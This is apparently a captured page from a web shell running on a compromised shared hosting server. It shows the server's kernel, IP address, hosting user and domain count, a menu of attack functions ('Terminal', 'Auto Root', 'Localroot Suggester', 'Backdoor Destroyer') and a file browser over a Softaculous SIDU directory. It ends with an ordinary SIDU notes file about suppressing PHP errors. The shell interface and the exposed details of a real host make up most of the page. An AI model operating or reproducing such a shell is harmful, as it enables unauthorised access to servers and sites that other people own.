Linux sagir-us1.hostever.us 5.14.0-570.51.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Oct 8 09:41:34 EDT 2025 x86_64
LiteSpeed
Server IP : 104.247.108.91 & Your IP : 216.73.216.105
Domains : 74 Domain
User : georgeto
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
sidu /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2026-03-16 05:43
php53
[ DIR ]
drwxr-xr-x
2026-03-16 05:43
php56
[ DIR ]
drwxr-xr-x
2026-03-16 05:43
php71
[ DIR ]
drwxr-xr-x
2026-03-16 05:43
php81
[ DIR ]
drwxr-xr-x
2026-03-16 05:43
php82
[ DIR ]
drwxr-xr-x
2026-03-16 05:43
fileindex.php
442
B
-rw-r--r--
2023-07-10 10:16
import.php
2.47
KB
-rw-r--r--
2026-03-13 14:44
info.xml
5.51
KB
-rw-r--r--
2026-03-13 13:36
install.js
921
B
-rw-r--r--
2021-12-23 12:54
install.php
3.01
KB
-rw-r--r--
2026-03-13 14:44
install.xml
199
B
-rw-r--r--
2021-12-23 12:54
md5
7.56
KB
-rw-r--r--
2026-03-13 14:44
notes.txt
927
B
-rw-r--r--
2021-12-23 12:54
upgrade.php
2.4
KB
-rw-r--r--
2026-03-13 14:44
upgrade.xml
231
B
-rw-r--r--
2021-12-23 12:54
Save
Rename
The following problem has been resolved in SIDU 3.7----------------------------------- If you get errors when you click on 'User' tab in menu then Solutions (Recommended by Script Vendor): 1 - open file: user.php ======================== <?php //0id 1tab 2user@host 3db 4table include 'inc.page.php'; $SIDU['page']['nav']='defa'; uppe(); echo "<div class='web'>"; main($SIDU,$user,$acs,$acs2,$grant,$cmd); echo '</div>'; down(); ... ========================= Above is the top part of user.php. simply add "@" before uppe() and main(...) and down() so it will look like the following: ======================== <?php //0id 1tab 2user@host 3db 4table include 'inc.page.php'; $SIDU['page']['nav']='defa'; @uppe(); echo "<div class='web'>"; @main($SIDU,$user,$acs,$acs2,$grant,$cmd); echo '</div>'; @down(); ... ========================= 2)We have changed the php requirement to 5.4 due to syntax error in version 6.0.